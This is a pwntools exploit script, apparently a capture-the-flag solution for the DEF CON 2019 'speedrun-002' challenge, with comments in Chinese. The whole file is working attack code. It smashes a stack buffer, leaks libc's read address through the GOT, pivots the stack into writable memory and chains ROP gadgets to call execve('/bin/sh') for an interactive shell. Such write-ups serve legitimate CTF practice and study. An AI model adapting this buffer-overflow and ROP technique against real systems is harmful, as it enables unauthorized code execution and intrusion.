#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *
import os
import time
import struct

# context.log_level = "debug"
# sh = remote('speedrun-002.quals2019.oooverflow.io', 31337)
sh = process('./speedrun-002')
elf = ELF('./speedrun-002')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

try:
    f = open('pid', 'w')
    f.write(str(proc.pidof(sh)[0]))
    f.close()
except Exception as e:
    print(e)

# 0x00000000004008a3 : pop rdi ; ret
pop_rdi_ret = 0x00000000004008a3
# 0x00000000004008a1 : pop rsi ; pop r15 ; ret
pop_rsi_pop_r15_ret = 0x00000000004008a1
# 0x00000000004006ec : pop rdx ; ret
pop_rdx_ret = 0x00000000004006ec
# 0x000000000040074a : leave ; ret
leave_ret = 0x000000000040074a

'''
.got.plt:0000000000601000                 dq offset stru_600E20
.got.plt:0000000000601008 qword_601008    dq 0                    ; DATA XREF: sub_400580↑r
.got.plt:0000000000601010 qword_601010    dq 0                    ; DATA XREF: sub_400580+6↑r
.got.plt:0000000000601018 off_601018      dq offset getenv        ; DATA XREF: _getenv↑r
.got.plt:0000000000601020 off_601020      dq offset strncmp       ; DATA XREF: _strncmp↑r
.got.plt:0000000000601028 off_601028      dq offset puts          ; DATA XREF: _puts↑r
.got.plt:0000000000601030 off_601030      dq offset write         ; DATA XREF: _write↑r
.got.plt:0000000000601038 off_601038      dq offset alarm         ; DATA XREF: _alarm↑r
.got.plt:0000000000601040 off_601040      dq offset c          ; DATA XREF: _read↑r
.got.plt:0000000000601048 off_601048      dq offset setvbuf       ; DATA XREF: _setvbuf↑r
.got.plt:0000000000601048 _got_plt        ends
'''

sh.recvuntil('What say you now?\n')
sh.send("Everything intelligent is so boring.")
sh.recvuntil('What an interesting thing to say.\nTell me more.\n')

# 新栈地址
container_addr = 0x602000 - 0x200
# pause()

layout = [
    'a' * 1024,
    # 这里设置 rbp
    p64(container_addr), # rbp
    # 读取 read 的地址
    p64(pop_rdi_ret),
    p64(elf.got['read']),
    p64(elf.plt['puts']),

    # 调用 read 函数，把我们要注入的新栈内容注入到container
    p64(pop_rdi_ret),
    p64(0), # fd
    p64(pop_rsi_pop_r15_ret),
    p64(container_addr), # buf
    p64(0), # r15
    p64(pop_rdx_ret),
    p64(0x100), # nbytes
    p64(elf.plt['read']), # read


    p64(leave_ret), # 栈转移
]

payload = flat(layout)

sh.sendline(payload)
sh.recvuntil('Fascinating.\n')

result = sh.recvuntil('\n')[:-1]
read_addr = u64(result.ljust(8, '\0'))
log.success('read_addr: ' + hex(read_addr))

''' 靶机的 symbols
 	Symbol 	Offset 	Difference
	system 	0x04f440 	0x0
	open 	0x10fc40 	0xc0800
	read 	0x110070 	0xc0c30
	write 	0x110140 	0xc0d00
	str_bin_sh 	0x1b3e9a 	0x164a5a
    execve 0x0000000000e4e30
'''

# # 靶机的地址
# libc_addr = read_addr - 0x110070
# system_addr = libc_addr + 0x04f440
# execve_addr = libc_addr + 0x0000000000e4e30
# str_bin_sh_addr = libc_addr + 0x1b3e9a

libc_addr = read_addr - libc.symbols['read']
system_addr = libc_addr + libc.symbols['system']
execve_addr = libc_addr + libc.symbols['execve']
str_bin_sh_addr = libc_addr + libc.search('/bin/sh').next()

log.success('libc_addr: ' + hex(libc_addr))
log.success('system_addr: ' + hex(system_addr))
log.success('execve_addr: ' + hex(execve_addr))
log.success('str_bin_sh_addr: ' + hex(str_bin_sh_addr))

# system 函数会受到 栈破坏的影响而不能使用
# layout2 = [
#     p64(container_addr - 16), # new rbp
#     p64(pop_rdi_ret),
#     p64(str_bin_sh_addr), # command
#     p64(system_addr),
# ]

layout2 = [
    p64(container_addr - 0x100), # new rbp
    p64(pop_rdi_ret),
    p64(str_bin_sh_addr), # filename
    p64(pop_rsi_pop_r15_ret),
    p64(0), # argv
    p64(0), # r15
    p64(pop_rdx_ret),
    p64(0), # envp
    p64(execve_addr)
]

payload2 = flat(layout2)
# pause()
sh.sendline(payload2)

# sh.sendline('cat /flag')

sh.interactive()

# 删除调试文件
os.system("rm -f pid")